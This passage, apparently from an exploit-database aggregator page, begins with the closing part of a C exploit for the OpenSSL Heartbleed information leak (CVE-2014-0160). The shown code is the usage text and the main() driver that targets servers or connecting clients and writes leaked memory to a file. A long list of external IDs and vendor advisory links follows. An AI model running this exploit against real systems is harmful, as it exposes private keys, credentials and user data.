printf("[ error: too many bad packets recieved\n");
exit(0);
}
return;
}
void usage(){
printf("[\n");
printf("[ --server|-s <ip/dns> - the server to target\n");
printf("[ --port|-p <port> - the port to target\n");
printf("[ --file|-f <filename> - file to write data to\n");
printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n");
printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n");
printf("[ 0 = SMTP\n");
printf("[ 1 = POP3\n");
printf("[ 2 = IMAP\n");
printf("[ --loop|-l - loop the exploit attempts\n");
printf("[ --type|-t <n> - select exploit to try\n");
printf("[ 0 = null length\n");
printf("[ 1 = max leak\n");
printf("[ n = heartbeat payload_length\n");
printf("[\n");
printf("[ --verbose|-v - output leak to screen\n");
printf("[ --help|-h - this output\n");
printf("[\n");
exit(0);
}
int main(int argc, char* argv[]){
int ret, port, userc, index;
int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;
int loop = 0;
struct hostent *h;
connection* c;
char *host, *file;
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
printf("[ =============================================================\n");
static struct option options[] = {
{"server", 1, 0, 's'},
{"port", 1, 0, 'p'},
{"file", 1, 0, 'f'},
{"type", 1, 0, 't'},
{"bind", 1, 0, 'b'},
{"verbose", 0, 0, 'v'},
{"precmd", 1, 0, 'c'},
{"loop", 0, 0, 'l'},
{"help", 0, 0,'h'}
};
while(userc != -1) {
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);
switch(userc) {
case -1:
break;
case 's':
if(ihost==0){
ihost = 1;
h = gethostbyname(optarg);
if(h==NULL){
printf("[!] FATAL: unknown host '%s'\n",optarg);
exit(1);
}
host = malloc(strlen(optarg) + 1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
}
break;
case 'p':
if(iport==0){
port = atoi(optarg);
iport = 1;
}
break;
case 'f':
if(ifile==0){
file = malloc(strlen(optarg) + 1);
if(file==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(file,"%s",optarg);
ifile = 1;
}
break;
case 't':
if(itype==0){
type = atoi(optarg);
itype = 1;
}
break;
case 'h':
usage();
break;
case 'b':
if(ihost==0){
ihost = 1;
host = malloc(strlen(optarg)+1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
bind = 1;
}
break;
case 'c':
if(iprecmd == 0){
iprecmd = 1;
precmd = atoi(optarg);
}
break;
case 'v':
verbose = 1;
break;
case 'l':
loop = 1;
break;
default:
break;
}
}
if(ihost==0||iport==0||ifile==0||itype==0||type < 0){
printf("[ try --help\n");
exit(0);
}
ssl_init();
if(bind==0){
ret = tcp_connect(host, port);
pre_cmd(ret, precmd, verbose);
c = tls_connect(ret);
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=1;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
else{
int sd, pid, i;
ret = tcp_bind(host, port);
while(1){
sd=accept(ret,0,0);
if(sd==-1){
printf("[!] FATAL: problem with accept()\n");
exit(0);
}
if(pid=fork()){
close(sd);
}
else{
c = tls_bind(sd);
pre_cmd(ret, precmd, verbose);
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=0;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
}
}
}
Trust: 1.0
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
EXPLOIT LANGUAGE
c
Trust: 1.0
PRICE
Free
Trust: 10.8
TYPE
'Heartbleed' Information Leak (1)
Trust: 1.0
TAGS
tag: | exploit | Trust: 6.5 |
tag: | proof of concept | Trust: 1.5 |
tag: | shell | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
tag: | python | Trust: 0.5 |
CREDITS
prdelka
Trust: 1.5
EXTERNAL IDS
db: | NVD | id: | CVE-2014-0160 | Trust: 10.2 |
db: | USCERT | id: | TA14-098A | Trust: 1.7 |
db: | EXPLOIT-DB | id: | 32791 | Trust: 1.6 |
db: | NVD | id: | CVE-2014-0346 | Trust: 1.0 |
db: | 0DAYTODAY | id: | 22118 | Trust: 0.6 |
db: | EDBNET | id: | 21855 | Trust: 0.6 |
db: | EDBNET | id: | 78335 | Trust: 0.6 |
db: | EDBNET | id: | 80511 | Trust: 0.6 |
db: | EDBNET | id: | 54305 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 22129 | Trust: 0.6 |
db: | EDBNET | id: | 21866 | Trust: 0.6 |
db: | PACKETSTORM | id: | 126072 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126308 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126288 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126090 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126065 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126048 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126069 | Trust: 0.5 |
db: | PACKETSTORM | id: | 151177 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126102 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126070 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126100 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126272 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126101 | Trust: 0.5 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01F | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01C | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01B | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01A | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01D | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01E | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-03 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-02 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-135-05 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-128-01 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-135-02 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-02A | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-114-01 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-126-01 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-15-344-01 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-135-04 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-03A | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-03B | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-126-01A | Trust: 0.3 |
db: | CERT/CC | id: | VU#720951 | Trust: 0.3 |
db: | DLINK | id: | SAP10022 | Trust: 0.3 |
db: | JUNIPER | id: | JSA10623 | Trust: 0.3 |
db: | MCAFEE | id: | SB10071 | Trust: 0.3 |
db: | BID | id: | 66690 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2014-0160 | Trust: 9.3 |
url: | https://www.intelligentexploit.com | Trust: 1.2 |
url: | https://nvd.nist.gov/vuln/detail/cve-2014-0346 | Trust: 1.0 |
url: | https://0day.today/exploits/22118 | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/32791/ | Trust: 0.6 |
url: | https://0day.today/exploits/22129 | Trust: 0.6 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004581 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020694 | Trust: 0.3 |
url: | http://support.lexmark.com/index?page=content&id=te597&locale=en&userlocale=en_us | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670303 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004608 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-114-01 | Trust: 0.3 |
url: | http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004610 | Trust: 0.3 |
url: | https://downloads.avaya.com/css/p8/documents/100179859 | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=kb29004 | Trust: 0.3 |
url: | http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-332187.htm | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21672075 | Trust: 0.3 |
url: | http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/ | Trust: 0.3 |
url: | https://support.software.dell.com/foglight/kb/122982 | Trust: 0.3 |
url: | http://kb.tableausoftware.com/articles/knowledgebase/heartbleed-issue | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020681 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01e | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04239374 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095202 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670161 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670066 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037392 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-02a | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095217 | Trust: 0.3 |
url: | http://www.symantec.com/content/en/us/enterprise/other_resources/b-symantec-product-list-heartbleed.pdf | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21669859 | Trust: 0.3 |
url: | https://blogs.oracle.com/security/entry/heartbleed_cve_2014_0160_vulnerability | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04264271 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670321 | Trust: 0.3 |
url: | http://www.hmailserver.com/devnet/?page=issuetracker_display&issueid=424 | Trust: 0.3 |
url: | https://technet.microsoft.com/en-us/library/security/2962393 | Trust: 0.3 |
url: | https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_aix_is_affected_by_a_vulnerability_in_openssl_cve_2014_0160?lang=en_us | Trust: 0.3 |
url: | http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140409-heartbleed | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671745 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475466 | Trust: 0.3 |
url: | http://community.microfocus.com/microfocus/corba/artix/w/knowledge_base/25633.artix-openssl-heartbleed-vulnerability-fix-available.aspx | Trust: 0.3 |
url: | http://securityadvisories.dlink.com/security/publication.aspx?name=sap10022 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21669839 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21676672 | Trust: 0.3 |
url: | https://blog.torproject.org/blog/tor-browser-354-released | Trust: 0.3 |
url: | http://blogs.opera.com/desktop/2014/04/opera-12-17/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671338 | Trust: 0.3 |
url: | https://support.tenable.com/support-center/advisory2.php | Trust: 0.3 |
url: | http://kb.parallels.com/en/121129/?=en | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037381 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04272043 | Trust: 0.3 |
url: | http://www.openssl.org/news/vulnerabilities.html | Trust: 0.3 |
url: | https://openvpn.net/index.php/access-server/download-openvpn-as-sw/532-release-notes-v200.html | Trust: 0.3 |
url: | http://www.kerio.com/kerio-connect-release-history | Trust: 0.3 |
url: | http://www.opera.com/docs/changelogs/windows/1217/ | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-135-02 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21669664 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037379 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04236102 | Trust: 0.3 |
url: | https://openvpn.net/index.php/download/community-downloads.html | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/130 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04260505 | Trust: 0.3 |
url: | http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/ | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01d | Trust: 0.3 |
url: | http://blog.proofpoint.com/2014/04/heartbleed-issue-security-update.html | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095218 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670242 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21670165 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21669763 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095124 | Trust: 0.3 |
url: | https://blog.pfsense.org/?p=1253 | Trust: 0.3 |
url: | https://www.openssl.org/news/secadv_20140407.txt | Trust: 0.3 |
url: | http://www.synology.com/en-global/releasenote/model/ds114 | Trust: 0.3 |
url: | https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay&spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04236102-5%257cdoclocale%253d% | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004615 | Trust: 0.3 |
url: | http://support.apple.com/kb/ht6203 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670316 | Trust: 0.3 |
url: | http://blogs.intel.com/application-security/2014/04/10/intelr-expressway-service-gateway-heartbleed-security-update/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671783 | Trust: 0.3 |
url: | https://www.support.nec.co.jp/view.aspx?id=3010100835 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-126-01 | Trust: 0.3 |
url: | https://6d860c942a745b5a2e22-2435f2f08e773abe005b52170fce6d94.ssl.cf2.rackcdn.com/security/ruckus-security-advisory-041414.txt | Trust: 0.3 |
url: | http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalid=kb35882 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04262495 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095143 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004616 | Trust: 0.3 |
url: | http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&id=3489 | Trust: 0.3 |
url: | http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671100 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04248997 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01c | Trust: 0.3 |
url: | http://forum.gta.com/forum/user-community-support/firewall-general/1463-openssl-heartbeat-heart-bleed-vulnerability-vu-720951-cve-2014-0160 | Trust: 0.3 |
url: | https://support.asperasoft.com/entries/50381253 | Trust: 0.3 |
url: | http://www.qnap.com/en/index.php?lang=en&sn=845&c=3034&sc=&n=21724 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670176 | Trust: 0.3 |
url: | http://www.sybase.com/detail?id=1099387 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04271396 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004599 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas8n1020021 | Trust: 0.3 |
url: | http://www.globalscape.com/file-sharing/ | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04260637 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-135-05 | Trust: 0.3 |
url: | http://www.symantec.com/business/support/index?page=content&id=tech216630 | Trust: 0.3 |
url: | https://kb.juniper.net/infocenter/index?page=content&id=jsa10623 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na- c04262472 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020715 | Trust: 0.3 |
url: | http://help.filemaker.com/app/answers/detail/a_id/13384/ | Trust: 0.3 |
url: | http://www.f-secure.com/en/web/labs_global/fsc-2014-1 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670560 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/advisories/icsa-15-344-01 | Trust: 0.3 |
url: | http://winscp.net/eng/docs/history#5.5.3 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-126-01a | Trust: 0.3 |
url: | https://kc.mcafee.com/corporate/index?page=content&id=sb10071 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04272594 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21666414 | Trust: 0.3 |
url: | https://www-304.ibm.com/connections/blogs/psirt/entry/security_vulnerabilities_have_been_discovered_in_the_openssl_libraries_which_a_customer_may_use_with_cloudant?lang=en_us | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2015/mar/84 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004661 | Trust: 0.3 |
url: | http://www-304.ibm.com/support/docview.wss?uid=isg3t1020707 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670864 | Trust: 0.3 |
url: | https://www.nomachine.com/forums/topic/nomachine-version-4-2-19-now-available | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670738 | Trust: 0.3 |
url: | http://nvidia.custhelp.com/app/answers/detail/a_id/3492 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04263236 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037384 | Trust: 0.3 |
url: | https://downloads.avaya.com/css/p8/documents/100179670 | Trust: 0.3 |
url: | http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-18.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004632 | Trust: 0.3 |
url: | http://www.netwinsite.com/surgemail/help/updates.htm | Trust: 0.3 |
url: | https://support.microsoft.com/kb/2962393 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670301 | Trust: 0.3 |
url: | http://files.trendmicro.com/documentation/readme/osce%20docs/critical%20patch%201044%20readme.txt | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/720951 | Trust: 0.3 |
url: | http://www.libreoffice.org/about-us/security/advisories/cve-2014-0160/ | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04273303 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670485 | Trust: 0.3 |
url: | https://www.python.org/download/releases/3.4.1 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04239375 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670060 | Trust: 0.3 |
url: | http://blogs.sophos.com/2014/04/09/sophos-utm-manager-and-openssl-vulnerability/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671127 | Trust: 0.3 |
url: | https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00037&languageid=en-fr | Trust: 0.3 |
url: | http://www.kerio.com/support/kerio-control/release-history | Trust: 0.3 |
url: | http://www.cerberusftp.com/products/releasenotes.html | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04259321 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04250814 | Trust: 0.3 |
url: | http://ftp.openbsd.org/pub/openbsd/patches/5.3/common/014_openssl.patch | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004582 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671096 | Trust: 0.3 |
url: | http://www.sonicwall.com/us/shared/download/ell_sonicwall_-_support_bulletin_-_cve-20140-1016_openssl_large_heartbeat_response_vulnerability.pdf | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04249113 | Trust: 0.3 |
url: | http://openssl.org/ | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10623&cat=sirt_1&actp=list | Trust: 0.3 |
url: | http://www.blackberry.com/btsc/kb35955 | Trust: 0.3 |
url: | https://www.adtran.com/pub/library/security%20advisory/adtsa-hb1001-20140410.pdf | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671197 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas8n1020034 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04236062 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037391 | Trust: 0.3 |
url: | https://documentsmart.com/security/wp-content/uploads/2014/04/cert_heartbleed-openssl_vulnerability_document_v1.31.pdf | Trust: 0.3 |
url: | http://www.sophos.com/en-us/support/knowledgebase/120854.aspx | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21674447 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670302 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095203 | Trust: 0.3 |
url: | http://www.pexip.com/sites/pexip/files/cve-2014-0160_security_bulletin_2014-04-09_1.pdf | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01a | Trust: 0.3 |
url: | https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay&spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04239375-2%257cdoclocale%253d% | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671954 | Trust: 0.3 |
url: | https://community.rapid7.com/docs/doc-2736 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037393 | Trust: 0.3 |
url: | http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/ | Trust: 0.3 |
url: | http://webserver.docs.gopivotal.com/security/cve-2014-0160-advisory.pdf | Trust: 0.3 |
url: | http://blogs.opera.com/security/2014/04/heartbleed-heartaches/ | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/129 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671128 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037380 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21669666 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01f | Trust: 0.3 |
url: | http://www.vmware.com/security/advisories/vmsa-2014-0004.html | Trust: 0.3 |
url: | https://www.barracuda.com/blogs/pmblog?bid=2279#.u012w_msyso | Trust: 0.3 |
url: | https://www.stunnel.org/sdf_changelog.html | Trust: 0.3 |
url: | http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670300 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670339 | Trust: 0.3 |
url: | https://code.google.com/p/mod-spdy/ | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=kb29007 | Trust: 0.3 |
url: | http://www.freebsd.org/security/advisories/freebsd-sa-14:06.openssl.asc | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004611 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004577 | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/131 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670164 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095144 | Trust: 0.3 |
url: | http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/ | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-03b | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04236102 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04267775 | Trust: 0.3 |
url: | http://www.websense.com/content/support/library/ni/shared/security-alerts/openssl-vul-2014.pdfweb | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04264595 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670750 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04286049 | Trust: 0.3 |
url: | http://heartbleed.com/ | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095187 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-02 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04268240 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas3bf6e25d1260a4de686257cc100631528 | Trust: 0.3 |
url: | https://gist.github.com/sh1n0b1/10100394 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020683 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-135-04 | Trust: 0.3 |
url: | http://freecode.com/projects/palantir-server/releases/363060 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671059 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01b | Trust: 0.3 |
url: | http://support.citrix.com/article/ctx140605 | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2014-0416.html | Trust: 0.3 |
url: | http://www.ibm.com/support/docview.wss?uid=swg21686583 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671098 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21670640 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-03a | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04267749 | Trust: 0.3 |
url: | https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={967f13f1-5720-4592-9beb-42ad69ea14dc} | Trust: 0.3 |
url: | http://www.fortiguard.com/advisory/fg-ir-14-011/ | Trust: 0.3 |
url: | https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=&solutionid=sk100173&src=securityalerts | Trust: 0.3 |
url: | http://googleonlinesecurity.blogspot.com/2014/04/google-services-updated-to-address.html | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-03 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670203 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04236062 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21669907 | Trust: 0.3 |
url: | https://kb.bluecoat.com/index?page=content&id=sa79&actp=list | Trust: 0.3 |
url: | https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140423-0_wd_arkeia_path_traversal_v10.txt | Trust: 0.3 |
